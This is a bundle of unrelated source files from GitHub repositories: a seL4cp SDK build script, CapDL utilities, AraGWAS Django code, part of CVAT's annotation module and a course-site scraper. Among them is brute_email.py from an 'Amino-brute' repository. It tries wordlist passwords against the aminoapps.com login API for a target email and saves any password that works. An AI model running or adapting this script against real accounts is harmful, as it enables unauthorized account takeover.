elements.append(["Mg",self.Mg])
elements.append(["As",self.As])
elements.append(["Se",self.Se])
elements.append(["Br",self.Br])
elements.append(["Sr",self.Sr])
elements.append(["Mo",self.Mo])
elements.append(["Ag",self.Ag])
elements.append(["Cd",self.Cd])
elements.append(["In",self.In])
elements.append(["Ba",self.Ba])
elements.append(["La",self.La])
elements.append(["Ti",self.Ti])
elements.append(["Pb",self.Pb])
elements.append(["Bi",self.Bi])
elements.append(["U",self.U])
return elements
def returnGases(self):
gases = []
gases.append(["CH4",self.CH4])
gases.append(["H2S",self.H2S])
gases.append(["H2",self.H2])
gases.append(["CO",self.CO])
return gases
def returnCompounds(self):
compounds = []
compounds.append(["nitrate",self.nitrate])
compounds.append(["nitrite",self.nitrite])
compounds.append(["ammonium",self.ammonium])
compounds.append(["sulfate",self.sulfate])
compounds.append(["chloride",self.chloride])
compounds.append(["phosphate",self.phosphate])
compounds.append(["iron2",self.iron2])
compounds.append(["bicarbonate",self.bicarbonate])
return compounds
def __getitem__(self,index):
return getattr(self,index)
``` |
{
"source": "1000teslas/sel4cp",
"score": 3
} |
#### File: 1000teslas/sel4cp/build_sdk.py
```python
from argparse import ArgumentParser
from os import popen, system
from shutil import copy
from pathlib import Path
from dataclasses import dataclass
from sys import executable
from tarfile import open as tar_open, TarInfo
from typing import Dict, Union, List, Tuple
NAME = "sel4cp"
VERSION = "1.2.6"
ENV_BIN_DIR = Path(executable).parent
SEL4CP_EPOCH = 1616367257
KERNEL_CONFIG_TYPE = Union[bool, str]
KERNEL_OPTIONS = Dict[str, KERNEL_CONFIG_TYPE]
@dataclass
class BoardInfo:
name: str
gcc_cpu: str
loader_link_address: int
kernel_options: KERNEL_CONFIG_TYPE
examples: Dict[str, Path]
@dataclass
class ConfigInfo:
name: str
debug: bool
kernel_options: KERNEL_CONFIG_TYPE
SUPPORTED_BOARDS = (
BoardInfo(
name="tqma8xqp1gb",
gcc_cpu="cortex-a35",
loader_link_address=0x80280000,
kernel_options = {
"KernelPlatform": "tqma8xqp1gb",
"KernelIsMCS": True,
"KernelArmExportPCNTUser": True,
},
examples = {
"ethernet": Path("example/tqma8xqp1gb/ethernet")
}
),
BoardInfo(
name="zcu102",
gcc_cpu="cortex-a53",
loader_link_address=0x40000000,
kernel_options = {
"KernelPlatform": "zynqmp",
"KernelARMPlatform": "zcu102",
"KernelIsMCS": True,
"KernelArmExportPCNTUser": True,
},
examples = {
"hello": Path("example/zcu102/hello")
}
)
)
SUPPORTED_CONFIGS = (
ConfigInfo(
name="release",
debug=False,
kernel_options = {},
),
ConfigInfo(
name="debug",
debug=True,
kernel_options = {
"KernelDebugBuild": True,
"KernelPrinting": True,
"KernelVerificationBuild": False
}
),
)
def tar_filter(tarinfo: TarInfo) -> TarInfo:
"""This is used to change the tarinfo when created the .tar.gz archive.
This ensures the tar file does not leak information from the build environment.
"""
# Force uid/gid
tarinfo.uid = tarinfo.gid = 0
tarinfo.uname = tarinfo.gname = "sel4cp"
# This is unlikely to be set, but force it anyway
tarinfo.pax_headers = {}
tarinfo.mtime = SEL4CP_EPOCH
assert tarinfo.isfile() or tarinfo.isdir()
# Set the permissions properly
if tarinfo.isdir():
tarinfo.mode = tarinfo.mode & ~0o777 | 0o557
if tarinfo.isfile():
if "/bin/" in tarinfo.name:
# Assume everything in bin should be executable.
tarinfo.mode = tarinfo.mode & ~0o777 | 0o755
else:
tarinfo.mode = tarinfo.mode & ~0o777 | 0o644
return tarinfo
def test_tool() -> None:
r = system(
f"{executable} -m unittest discover -s tool -v"
)
assert r == 0
def build_tool(tool_target: Path) -> None:
pyoxidizer = ENV_BIN_DIR / "pyoxidizer"
if not pyoxidizer.exists():
raise Exception("pyoxidizer does not appear to be installed in your Python environment")
r = system(
f"{pyoxidizer} build --release --path tool --target-triple x86_64-unknown-linux-musl"
)
assert r == 0
tool_output = "./tool/build/x86_64-unknown-linux-musl/release/install/sel4cp"
r = system(f"strip {tool_output}")
assert r == 0
copy(tool_output, tool_target)
def build_sel4(
sel4_dir: Path,
root_dir: Path,
build_dir: Path,
board: BoardInfo,
config: ConfigInfo,
) -> None:
"""Build seL4"""
build_dir = build_dir / board.name / config.name / "sel4"
build_dir.mkdir(exist_ok=True, parents=True)
sel4_install_dir = build_dir / "install"
sel4_build_dir = build_dir / "build"
sel4_install_dir.mkdir(exist_ok=True, parents=True)
sel4_build_dir.mkdir(exist_ok=True, parents=True)
print(f"Building sel4: {sel4_dir=} {root_dir=} {build_dir=} {board=} {config=}")
config_args = list(board.kernel_options.items()) + list(config.kernel_options.items())
config_strs = []
for arg, val in sorted(config_args):
if isinstance(val, bool):
str_val = "ON" if val else "OFF"
else:
str_val = str(val)
s = f"-D{arg}={str_val}"
config_strs.append(s)
config_str = " ".join(config_strs)
platform = board.name
cmd = (
f"cmake -GNinja -DCMAKE_INSTALL_PREFIX={sel4_install_dir.absolute()} "\
f" -DPYTHON3={executable} " \
f" -DKernelPlatform={platform} {config_str} " \
f"-S {sel4_dir.absolute()} -B {sel4_build_dir.absolute()}")
r = system(cmd)
if r != 0:
raise Exception(f"Error configuring sel4: cmd={cmd}")
cmd = f"cmake --build {sel4_build_dir.absolute()}"
r = system(cmd)
if r != 0:
raise Exception(f"Error building sel4: cmd={cmd}")
cmd = f"cmake --install {sel4_build_dir.absolute()}"
r = system(cmd)
if r != 0:
raise Exception(f"Error installing sel4: cmd={cmd}")
elf = sel4_install_dir / "bin" / "kernel.elf"
dest = (
root_dir / "board" / board.name / config.name / "elf" / "sel4.elf"
)
dest.unlink(missing_ok=True)
copy(elf, dest)
# Make output read-only
dest.chmod(0o444)
include_dir = root_dir / "board" / board.name / config.name / "include"
for source in ("kernel_Config", "libsel4", "libsel4/sel4_Config", "libsel4/autoconf"):
source_dir = sel4_install_dir / source / "include"
for p in source_dir.rglob("*"):
if not p.is_file():
continue
rel = p.relative_to(source_dir)
dest = include_dir / rel
dest.parent.mkdir(exist_ok=True, parents=True)
dest.unlink(missing_ok=True)
copy(p, dest)
dest.chmod(0o444)
def build_elf_component(
component_name: str,
root_dir: Path,
build_dir: Path,
board: BoardInfo,
config: ConfigInfo,
defines: List[Tuple[str, str]]
) -> None:
"""Build a specific ELF component.
Right now this is either the loader or the monitor
"""
sel4_dir = root_dir / "board" / board.name / config.name
build_dir = build_dir / board.name / config.name / component_name
build_dir.mkdir(exist_ok=True, parents=True)
defines_str = " ".join(f"{k}={v}" for k, v in defines)
r = system(
f"BOARD={board.name} BUILD_DIR={build_dir.absolute()} GCC_CPU={board.gcc_cpu} SEL4_SDK={sel4_dir.absolute()} {defines_str} make -C {component_name}"
)
if r != 0:
raise Exception(
f"Error building: {component_name} for board: {board.name} config: {config.name}"
)
elf = build_dir / f"{component_name}.elf"
dest = (
root_dir / "board" / board.name / config.name / "elf" / f"{component_name}.elf"
)
dest.unlink(missing_ok=True)
copy(elf, dest)
# Make output read-only
dest.chmod(0o444)
def build_doc(root_dir):
output = root_dir / "doc" / "sel4cp_user_manual.pdf"
r = system(f'pandoc docs/manual.md -o {output}')
assert r == 0
def build_lib_component(
component_name: str,
root_dir: Path,
build_dir: Path,
board: BoardInfo,
config: ConfigInfo,
) -> None:
"""Build a specific library component.
Right now this is just libsel4.a
"""
sel4_dir = root_dir / "board" / board.name / config.name
build_dir = build_dir / board.name / config.name / component_name
build_dir.mkdir(exist_ok=True, parents=True)
r = system(
f"BUILD_DIR={build_dir.absolute()} GCC_CPU={board.gcc_cpu} SEL4_SDK={sel4_dir.absolute()} make -C {component_name}"
)
if r != 0:
raise Exception(
f"Error building: {component_name} for board: {board.name} config: {config.name}"
)
lib = build_dir / f"{component_name}.a"
lib_dir = root_dir / "board" / board.name / config.name / "lib"
dest = lib_dir / f"{component_name}.a"
dest.unlink(missing_ok=True)
copy(lib, dest)
# Make output read-only
dest.chmod(0o444)
link_script = Path(component_name) / "sel4cp.ld"
dest = lib_dir / "sel4cp.ld"
dest.unlink(missing_ok=True)
copy(link_script, dest)
# Make output read-only
dest.chmod(0o444)
crt0 = build_dir / "crt0.o"
dest = lib_dir / "crt0.o"
dest.unlink(missing_ok=True)
copy(crt0, dest)
# Make output read-only
dest.chmod(0o444)
include_dir = root_dir / "board" / board.name / config.name / "include"
source_dir = Path(component_name) / "include"
for p in source_dir.rglob("*"):
if not p.is_file():
continue
rel = p.relative_to(source_dir)
dest = include_dir / rel
dest.parent.mkdir(exist_ok=True, parents=True)
dest.unlink(missing_ok=True)
copy(p, dest)
dest.chmod(0o444)
def main() -> None:
parser = ArgumentParser()
parser.add_argument("--sel4", type=Path, required=True)
args = parser.parse_args()
sel4_dir = args.sel4.expanduser()
if not sel4_dir.exists():
raise Exception(f"sel4_dir: {sel4_dir} does not exist")
root_dir = Path("release") / f"{NAME}-sdk-{VERSION}"
tar_file = Path("release") / f"{NAME}-sdk-{VERSION}.tar.gz"
source_tar_file = Path("release") / f"{NAME}-source-{VERSION}.tar.gz"
dir_structure = [
root_dir / "doc",
root_dir / "bin",
root_dir / "board",
]
for board in SUPPORTED_BOARDS:
board_dir = root_dir / "board" / board.name
dir_structure.append(board_dir)
for config in SUPPORTED_CONFIGS:
config_dir = board_dir / config.name
dir_structure.append(config_dir)
dir_structure += [
config_dir / "include",
config_dir / "lib",
config_dir / "elf",
]
for dr in dir_structure:
dr.mkdir(exist_ok=True, parents=True)
copy(Path("LICENSE"), root_dir)
tool_target = root_dir / "bin" / "sel4cp"
if not tool_target.exists():
test_tool()
build_tool(tool_target)
build_doc(root_dir)
build_dir = Path("build")
for board in SUPPORTED_BOARDS:
for config in SUPPORTED_CONFIGS:
build_sel4(sel4_dir, root_dir, build_dir, board, config)
loader_defines = [
("LINK_ADDRESS", hex(board.loader_link_address))
]
build_elf_component("loader", root_dir, build_dir, board, config, loader_defines)
build_elf_component("monitor", root_dir, build_dir, board, config, [])
build_lib_component("libsel4cp", root_dir, build_dir, board, config)
# Setup the examples
for example, example_path in board.examples.items():
include_dir = root_dir / "board" / board.name / "example" / example
source_dir = example_path
for p in source_dir.rglob("*"):
if not p.is_file():
continue
rel = p.relative_to(source_dir)
dest = include_dir / rel
dest.parent.mkdir(exist_ok=True, parents=True)
dest.unlink(missing_ok=True)
copy(p, dest)
dest.chmod(0o444)
# At this point we create a tar.gz file
with tar_open(tar_file, "w:gz") as tar:
tar.add(root_dir, arcname=root_dir.name, filter=tar_filter)
# Build the source tar
process = popen("git ls-files")
filenames = [Path(fn.strip()) for fn in process.readlines()]
process.close()
source_prefix = Path(f"{NAME}-source-{VERSION}")
with tar_open(source_tar_file, "w:gz") as tar:
for filename in filenames:
tar.add(filename, arcname=source_prefix / filename, filter=tar_filter)
if __name__ == "__main__":
main()
```
#### File: tool/sel4coreplat/cdlutil.py
```python
from sel4coreplat import capdl
from typing import (Any, NamedTuple, Optional, Tuple, Union)
from sel4coreplat.capdl.Object import (register_object_sizes, ObjectType)
from sel4coreplat.util import (MemoryRegion)
from sel4coreplat.sysxml import (ProtectionDomain)
from sel4coreplat.sysxml import (SysMap, SysMemoryRegion)
def cdlsafe(string: str) -> str:
'''Turns a string into an object name that can be safely used in CapDL specs.'''
return ''.join(c.lower() if c.isalnum() else '_' for c in string)
aarch64_sizes = {
ObjectType.seL4_TCBObject: 11,
ObjectType.seL4_EndpointObject: 4,
ObjectType.seL4_NotificationObject: 6,
ObjectType.seL4_SmallPageObject: 12,
ObjectType.seL4_LargePageObject: 21,
ObjectType.seL4_ASID_Pool: 12 ,
ObjectType.seL4_ASID_Table: 9,
ObjectType.seL4_Slot: 5,
# ObjectType.seL4_Value_MinUntypedBits: 4,
# ObjectType.seL4_Value_MaxUntypedBits: 47,
# ObjectType.seL4_Value_BadgeBits: 64,
ObjectType.seL4_RTReplyObject: 5,
ObjectType.seL4_VCPU: 12,
ObjectType.seL4_PageTableObject: 12,
ObjectType.seL4_PageDirectoryObject: 12,
ObjectType.seL4_ARM_SectionObject: 21,
ObjectType.seL4_ARM_SuperSectionObject: 25,
ObjectType.seL4_HugePageObject: 30,
ObjectType.seL4_AARCH64_PGD: 12,
ObjectType.seL4_AARCH64_PUD: 12,
ObjectType.seL4_IOPageTableObject: 12,
ObjectType.seL4_X64_PDPT: 12,
ObjectType.seL4_X64_PML4: 12,
ObjectType.seL4_SchedContextObject: 8,
# ObjectType.seL4_IOPorts: 0,
# ObjectType.seL4_IODevice: 0,
# ObjectType.seL4_ARMIODevice: 0,
# ObjectType.seL4_IRQ: 0,
# ObjectType.seL4_IOAPICIRQ: 0,
# ObjectType.seL4_MSIIRQ: 0,
# ObjectType.seL4_ARMIRQ: 0,
# ObjectType.seL4_ARMSID: 0,
# ObjectType.seL4_ARMCB: 0,
}
def register_aarch64_sizes() -> None:
register_object_sizes(aarch64_sizes)
# Structured objects for keeping track of CDL-specific info in __main__:
MRInfoNotELF = NamedTuple('MRInfoNotELF', [])
MRInfoELF = NamedTuple('MRInfoELF', [('pd_name', str), ('seg_index', int)])
MRInfo = Union[MRInfoNotELF, MRInfoELF]
PageInfoNotELF = NamedTuple('PageInfoNotELF', [])
PageInfoELF = NamedTuple('PageInfoELF', [('pd_name', str), ('seg_index', int), ('index', int)])
PageInfo = Union[PageInfoNotELF, PageInfoELF]
def mrinfo_to_pageinfo(mri: MRInfo, index: int) -> PageInfo:
if isinstance(mri, MRInfoELF):
return PageInfoELF(mri.pd_name, mri.seg_index, index)
return PageInfoNotELF()
# Structured objects for keeping track of the mapping table.
# A mapping table is required because the capdl initialiser sort of reverses
# how sel4 expects things to be mapped. In sel4 you provide a vaddr that is
# resolved from the top of the vspace. Think of the vaddr as providing the
# path to get from the top-level paging structure (the pgd), all the way to
# the specific slot. While in capdl you construct this vaddr from its
# components (the slot being mapped to in the current level, and the slots
# that the various structures are mapped to in the higher levels).
# Hence, to generate the CapDL, we need the mapping table to reverse this
# mapping.
GlobalDir = NamedTuple('GlobalDir', [('pd_index', int)])
UpperDir = NamedTuple('UpperDir', [('pd_index',int)])
LowerDir = NamedTuple('LowerDir', [('pd_index',int)])
PTable = NamedTuple('PTable', [('pd_index',int)])
PFrame = NamedTuple('PFrame', [('pd_index',int),('page_size', int)])
MTESort = Union[GlobalDir, UpperDir, LowerDir, PTable, PFrame]
MTE = NamedTuple('MTE', # mapping table entry
[('sort', MTESort),
('vaddr', int)])
alignment_of_sort = {
PFrame: 12,
PTable: 12 + 9,
LowerDir: 12 + 9 + 9,
UpperDir: 12 + 9 + 9 + 9,
GlobalDir: 12 + 9 + 9 + 9 # faux, see vaddr_to_gd
}
def alignment_of_mte(mte: MTE) -> int:
if isinstance(mte.sort, PFrame):
return alignment_of_sort[PFrame]
if isinstance(mte.sort, PTable):
return alignment_of_sort[PTable]
if isinstance(mte.sort, LowerDir):
return alignment_of_sort[LowerDir]
if isinstance(mte.sort, UpperDir):
return alignment_of_sort[UpperDir]
if isinstance(mte.sort, GlobalDir):
return alignment_of_sort[GlobalDir]
raise ValueError()
def vaddr_to_gd(vaddr: int) -> MTE:
# this is a faux MTE to facilitate parent lookups for PUDs
alignment = alignment_of_sort[GlobalDir]
truncated = (vaddr >> alignment) << alignment
return MTE(GlobalDir(0), truncated)
def vaddr_to_ud(vaddr: int) -> MTE:
alignment = alignment_of_sort[UpperDir]
truncated = (vaddr >> alignment) << alignment
# FIXME These numbers are ad-hoc and will fail with multiple PDs.
# vaddr fns should take an arg for pd_index instead
return MTE(UpperDir(1), truncated)
def vaddr_to_d(vaddr: int) -> MTE:
alignment = alignment_of_sort[LowerDir]
truncated = (vaddr >> alignment) << alignment
return MTE(LowerDir(2), truncated)
def vaddr_to_pt(vaddr: int) -> MTE:
alignment = alignment_of_sort[PTable]
truncated = (vaddr >> alignment) << alignment
return MTE(PTable(3), truncated)
def vaddr_to_pf(vaddr: int, page_size: int) -> MTE:
return MTE(PFrame(4, page_size), vaddr)
def parent_mte_of(mte: MTE) -> MTE:
if isinstance(mte.sort, UpperDir):
return vaddr_to_gd(mte.vaddr)
if isinstance(mte.sort, LowerDir):
return vaddr_to_ud(mte.vaddr)
if isinstance(mte.sort, PTable):
return vaddr_to_d(mte.vaddr)
if isinstance(mte.sort, PFrame):
return vaddr_to_pt(mte.vaddr)
raise ValueError()
def mapping_slot_of(current_mte: MTE) -> int:
'''Returns the slot number of an MTE inside its parent in the CapDL.'''
parent_mte = parent_mte_of(current_mte)
slot = current_mte.vaddr - parent_mte.vaddr
alignment = alignment_of_mte(current_mte)
return (slot >> alignment)
``` |
{
"source": "100123546/Amino-brute",
"score": 3
} |
#### File: Amino-brute/app/brute_email.py
```python
import configparser
import aiohttp
import time
import asyncio
config = configparser.ConfigParser()
config.read("settings.ini")
async def brute(password, email):
while True:
for word in password:
word = str(word).replace('\n','')
jsonData = {'recaptcha_challenge':config["system"]["recaptcha_challenge"],'recaptcha_version':config["system"]["recaptcha_version"], 'auth_type':0,'secret':word, 'email':email}
async with aiohttp.ClientSession() as session:
async with session.post('https://aminoapps.com/api/auth', json=jsonData) as resp:
r = await resp.json()
time.sleep(0.5)
try:
if 'nickname' in r['result'] or 'title' in r['result']:
passwordFound = open('password_result.txt','w+')
passwordFound.write(f'{email}:{word}\n')
passwordFound.close()
print(f'[S.W.M] -- > Пароль найден!\n\n[S.W.M] -- > Пароль: {str(word)}')
return False
else:
print(f'[S.W.M] Пароль {str(word)} не подошёл.')
except KeyError:
pass
``` |
{
"source": "100156994/python",
"score": 3
} |
#### File: 100156994/python/spider.py
```python
import requests,re,bs4
url="https://www.imooc.com/course/list"
req=requests.get(url)
req.encoding="UTF-8"
soup=bs4.BeautifulSoup(req.text,'lxml')
li=soup.find_all("li",class_="course-nav-item ")
lb=[]#方向+类别,结构:名称 链接'
for index in range(len(li)):
lb.append([li[index].text,li[index].a.get('href')])
def deal(str):
r=requests.get(url+str)
r.encoding="UTF-8"
soup=bs4.BeautifulSoup(r.text,'lxml')
pages=soup.find_all('div',class_='page')
m=len(pages[0].find_all('a'))
cons=[]
for k in range(1,m+2):
re=requests.get(url+str+"&page=%d" %(k))
re.encoding="UTF-8"
soup=bs4.BeautifulSoup(re.text,'lxml')
contex=soup.find_all('div',class_="course-card-container")
#用于第一个链接具体内容,结构:课程名 等级 人数 时长 分数 备注 链接
for index in range(len(contex)):
spans=contex[index].find_all('span')
rs=requests.get('https://www.imooc.com'+contex[index].a.get('href'))
s=bs4.BeautifulSoup(rs.text,'lxml')
lon=s.find_all('div',class_='static-item l')
grade=s.find('div',class_='static-item l score-btn')
cons.append([contex[index].h3.text,spans[0].text,spans[1].text,lon[2].find_all('span',class_="meta-value")[0].text,grade.find_all('span',class_="meta-value")[0].text,contex[index].p.text,contex[index].a.get('href')])
return cons
``` |
{
"source": "1001genomes/AraGWAS",
"score": 2
} |
#### File: aragwas_server/gwasdb/apps.py
```python
from django.apps import AppConfig
class GwasdbConfig(AppConfig):
name = 'gwasdb'
def ready(self):
super(GwasdbConfig, self).ready()
# import myapp.signals
import gwasdb.checks
```
#### File: management/commands/import_phenotypes.py
```python
from django.core.management.base import BaseCommand, CommandError
from gwasdb.models import Phenotype
import requests
class Command(BaseCommand):
help = 'Index AraPheno phenotypes in AraGWASCatalog'
def add_arguments(self, parser):
parser.add_argument('--id',
dest='phenotype_id',
type=int,
default=None,
help='Specify a primary key to index a specific phenotype. If empty will check entire phenotype list.')
parser.add_argument('--update',
dest='update',
type=bool,
default=False,
help='Update existing phenotypes.')
def handle(self, *args, **options):
phenotype_id = options.get('phenotype_id', None)
update = options.get('update', False)
try:
if phenotype_id:
r = requests.get('https://arapheno.1001genomes.org/rest/phenotype/list.json')
phenos_arapheno = [r.json()]
else:
# Retrieve list of all phenotypes from AraPheno:
r = requests.get('https://arapheno.1001genomes.org/rest/phenotype/list.json')
phenos_arapheno = r.json()
# check if phenotypes are stored in AraGWASCatalog
ids_aragwas = Phenotype.objects.all().values_list('id', flat=True)
counter = 0
for pheno in phenos_arapheno:
if pheno['phenotype_id'] not in ids_aragwas or update:
# Add to table:
p = Phenotype(pk=pheno['phenotype_id'], name=pheno['name'], study_name=pheno['study'], description=pheno['scoring'], date=pheno['integration_date'], arapheno_link="https://arapheno.1001genomes.org/phenotype/"+str(pheno['phenotype_id']), trait_ontology_id=pheno['to_term'] if pheno['to_term'] is not None else "", trait_ontology_name=pheno['to_name'] if pheno['to_name'] is not None else "", trait_ontology_description=pheno['to_definition'])
p.save()
counter += 1
# else:
# # add ontology information (this line will be removed after one call...
# p = Phenotype.objects.get(pk=pheno['phenotype_id'])
# p.trait_ontology_id = pheno['to_term'] if pheno['to_term'] is not None else ""
# p.trait_ontology_name = pheno['to_name'] if pheno['to_name'] is not None else ""
# p.trait_ontology_description=pheno['to_definition']
# p.save()
# counter += 1
print(str(counter) + ' new phenotype(s) added to the database.')
except Exception as err:
raise CommandError(
'Error saving phenotypes. Reason: %s' % str(err))
```
#### File: aragwas_server/gwasdb/serializers.py
```python
from rest_framework import serializers
from gwasdb.models import Study, Genotype, Phenotype
class ApiVersionSerializer(serializers.Serializer):
"""Serializers the API version information"""
version = serializers.CharField(read_only=True)
githash = serializers.CharField(read_only=True)
build = serializers.CharField(read_only=True)
build_url = serializers.URLField(read_only=True)
github_url = serializers.URLField(read_only=True)
date = serializers.DateField(read_only=True)
class GenotypeSerializer(serializers.ModelSerializer):
class Meta:
model = Genotype
fields = '__all__'
class EsPhenotypeSerializer(serializers.ModelSerializer):
"""Serializer for elasticserach"""
suggest = serializers.SerializerMethodField()
def get_suggest(self, instance):
return [instance.name]
class Meta:
model = Phenotype
fields = ('id', 'suggest', 'name', 'study_name', 'description', 'date')
class EsGenotypeSerializer(serializers.ModelSerializer):
"""Serializer for elasticserach"""
class Meta:
model = Genotype
fields = ('id', 'name', 'description', 'version')
class EsStudySerializer(serializers.ModelSerializer):
"""Serializer for elasticserach"""
suggest = serializers.SerializerMethodField()
genotype = EsGenotypeSerializer(many=False)
phenotype = EsPhenotypeSerializer(many=False)
def get_suggest(self, instance):
return [instance.name]
class Meta:
model = Study
fields = ('id', 'suggest', 'name', 'transformation', 'method', 'genotype', 'phenotype','n_hits_bonf','n_hits_perm','n_hits_thr')
"""
Study List Serializer Class (read-only)
"""
class StudySerializer(serializers.ModelSerializer):
association_count = serializers.SerializerMethodField()
genotype = serializers.SerializerMethodField()
phenotype = serializers.SerializerMethodField()
phenotype_pk = serializers.SerializerMethodField()
phenotype_description = serializers.SerializerMethodField()
phenotype_to_id = serializers.SerializerMethodField()
phenotype_to_name = serializers.SerializerMethodField()
phenotype_to_description = serializers.SerializerMethodField()
class Meta:
model = Study
fields = ('name','genotype','phenotype','phenotype_pk','phenotype_description','method','transformation', 'publication', 'publication_pmid',
'association_count','pk','n_hits_bonf','n_hits_perm','n_hits_fdr','n_hits_thr','bonferroni_threshold',
'permutation_threshold','bh_threshold','number_samples', 'number_countries', 'doi', 'phenotype_to_id', 'phenotype_to_name', 'phenotype_to_description')
def get_association_count(self, obj):
try:
return obj.association_set.count()
except:
return ""
def get_genotype(self, obj):
try:
return "{} v{}".format(obj.genotype.name, obj.genotype.version)
except:
return ""
def get_phenotype(self, obj):
try:
return obj.phenotype.name
except:
return ""
def get_phenotype_pk(self,obj):
try:
return obj.phenotype.pk
except:
return ""
def get_phenotype_description(self,obj):
try:
return obj.phenotype.description
except:
return ""
def get_phenotype_to_id(self,obj):
try:
return obj.phenotype.trait_ontology_id
except:
return ""
def get_phenotype_to_name(self,obj):
try:
return obj.phenotype.trait_ontology_name
except:
return ""
def get_phenotype_to_description(self,obj):
try:
return obj.phenotype.trait_ontology_description
except:
return ""
"""
Phenotype List Serializer Class (read-only)
"""
class PhenotypeListSerializer(serializers.ModelSerializer):
class Meta:
model = Phenotype
fields = ('name','description','arapheno_link','pk','study_set','trait_ontology_id','trait_ontology_name','trait_ontology_description')
``` |
{
"source": "100330734/cvat",
"score": 2
} |
#### File: apps/engine/annotation.py
```python
import os
import copy
from django.utils import timezone
from collections import OrderedDict
import numpy as np
from scipy.optimize import linear_sum_assignment
from collections import OrderedDict
from distutils.util import strtobool
from xml.sax.saxutils import XMLGenerator
from abc import ABCMeta, abstractmethod
from PIL import Image
import django_rq
from django.conf import settings
from django.db import transaction
from cvat.apps.profiler import silk_profile
from cvat.apps.engine.plugins import plugin_decorator
from . import models
from .task import get_frame_path, get_image_meta_cache
from .log import slogger
############################# Low Level server API
FORMAT_XML = 1
FORMAT_JSON = 2
def dump(tid, data_format, scheme, host):
"""
Dump annotation for the task in specified data format.
"""
queue = django_rq.get_queue('default')
queue.enqueue_call(func=_dump, args=(tid, data_format, scheme, host, OrderedDict()),
job_id="annotation.dump/{}".format(tid))
def check(tid):
"""
Check that potentially long operation 'dump' is completed.
Return the status as json/dictionary object.
"""
queue = django_rq.get_queue('default')
job = queue.fetch_job("annotation.dump/{}".format(tid))
if job is None:
response = {"state": "unknown"}
elif job.is_failed:
# FIXME: here we have potential race. In general job.exc_info is
# initialized inside handler but the method can be called before
# that. By a reason exc_info isn't initialized by RQ python.
response = {
"state": "error",
"stderr": job.exc_info}
elif job.is_finished:
response = {"state": "created"}
else:
response = {"state": "started"}
return response
@transaction.atomic
def get(jid):
"""
Get annotations for the job.
"""
db_job = models.Job.objects.select_for_update().get(id=jid)
annotation = _AnnotationForJob(db_job)
annotation.init_from_db()
return annotation.to_client()
@silk_profile(name="Save job")
@plugin_decorator
@transaction.atomic
def save_job(jid, data):
"""
Save new annotations for the job.
"""
slogger.job[jid].info("Enter save_job API: jid = {}".format(jid))
db_job = models.Job.objects.select_related('segment__task') \
.select_for_update().get(id=jid)
annotation = _AnnotationForJob(db_job)
annotation.force_set_client_id(data['create'])
client_ids = annotation.validate_data_from_client(data)
annotation.delete_from_db(data['delete'])
annotation.save_to_db(data['create'])
annotation.update_in_db(data['update'])
updated = sum([ len(data["update"][key]) for key in data["update"] ])
deleted = sum([ len(data["delete"][key]) for key in data["delete"] ])
created = sum([ len(data["create"][key]) for key in data["create"] ])
if updated or deleted or created:
db_job.segment.task.updated_date = timezone.now()
db_job.segment.task.save()
db_job.max_shape_id = max(db_job.max_shape_id, max(client_ids['create']) if client_ids['create'] else -1)
db_job.save()
slogger.job[jid].info("Leave save_job API: jid = {}".format(jid))
@silk_profile(name="Clear job")
@transaction.atomic
def clear_job(jid):
"""
Clear annotations for the job.
"""
slogger.job[jid].info("Enter clear_job API: jid = {}".format(jid))
db_job = models.Job.objects.select_related('segment__task') \
.select_for_update().get(id=jid)
annotation = _AnnotationForJob(db_job)
annotation.delete_all_shapes_from_db()
annotation.delete_all_paths_from_db()
db_job.segment.task.updated_date = timezone.now()
db_job.segment.task.save()
slogger.job[jid].info("Leave clear_job API: jid = {}".format(jid))
# pylint: disable=unused-argument
@silk_profile(name="Save task")
def save_task(tid, data):
"""
Save new annotations for the task.
"""
slogger.task[tid].info("Enter save_task API: tid = {}".format(tid))
db_task = models.Task.objects.get(id=tid)
db_segments = list(db_task.segment_set.prefetch_related('job_set').all())
splitted_data = {}
for segment in db_segments:
jid = segment.job_set.first().id
start = segment.start_frame
stop = segment.stop_frame
splitted_data[jid] = {}
for action in ['create', 'update', 'delete']:
splitted_data[jid][action] = {
"boxes": list(filter(lambda x: start <= int(x['frame']) <= stop, data[action]['boxes'])),
"polygons": list(filter(lambda x: start <= int(x['frame']) <= stop, data[action]['polygons'])),
"polylines": list(filter(lambda x: start <= int(x['frame']) <= stop, data[action]['polylines'])),
"points": list(filter(lambda x: start <= int(x['frame']) <= stop, data[action]['points'])),
"box_paths": list(filter(lambda x: len(list(filter(lambda y: (start <= int(y['frame']) <= stop) and (not y['outside']), x['shapes']))), data[action]['box_paths'])),
"polygon_paths": list(filter(lambda x: len(list(filter(lambda y: (start <= int(y['frame']) <= stop) and (not y['outside']), x['shapes']))), data[action]['polygon_paths'])),
"polyline_paths": list(filter(lambda x: len(list(filter(lambda y: (start <= int(y['frame']) <= stop) and (not y['outside']), x['shapes']))), data[action]['polyline_paths'])),
"points_paths": list(filter(lambda x: len(list(filter(lambda y: (start <= int(y['frame']) <= stop) and (not y['outside']), x['shapes']))), data[action]['points_paths'])),
}
for jid, _data in splitted_data.items():
# if an item inside _data isn't empty need to call save_job
isNonEmpty = False
for action in ['create', 'update', 'delete']:
for objects in _data[action].values():
if objects:
isNonEmpty = True
break
if isNonEmpty:
save_job(jid, _data)
slogger.task[tid].info("Leave save_task API: tid = {}".format(tid))
# pylint: disable=unused-argument
@silk_profile(name="Clear task")
def clear_task(tid):
"""
Clear annotations for the task.
"""
slogger.task[tid].info("Enter clear_task API: tid = {}".format(tid))
db_task = models.Task.objects.get(id=tid)
db_segments = list(db_task.segment_set.prefetch_related('job_set').all())
for db_segment in db_segments:
for db_job in list(db_segment.job_set.all()):
clear_job(db_job.id)
slogger.task[tid].info("Leave clear_task API: tid = {}".format(tid))
# pylint: disable=unused-argument
def rq_handler(job, exc_type, exc_value, traceback):
tid = job.id.split('/')[1]
slogger.task[tid].error("dump annotation error was occured", exc_info=True)
##################################################
class _Label:
def __init__(self, db_label):
self.id = db_label.id
self.name = db_label.name
class _Attribute:
def __init__(self, db_attr, value):
self.id = db_attr.id
self.name = db_attr.get_name()
if db_attr.get_type() == 'checkbox':
self.value = str(value).lower()
else:
self.value = str(value)
class _BoundingBox:
def __init__(self, x0, y0, x1, y1, frame, occluded, z_order, client_id=None, attributes=None):
self.xtl = x0
self.ytl = y0
self.xbr = x1
self.ybr = y1
self.occluded = occluded
self.z_order = z_order
self.client_id = client_id
self.frame = frame
self.attributes = attributes if attributes else []
def merge(self, box):
# The occluded property and attributes cannot be merged. Let's keep
# original attributes and occluded property of the self object.
assert self.frame == box.frame
self.xtl = (self.xtl + box.xtl) / 2
self.ytl = (self.ytl + box.ytl) / 2
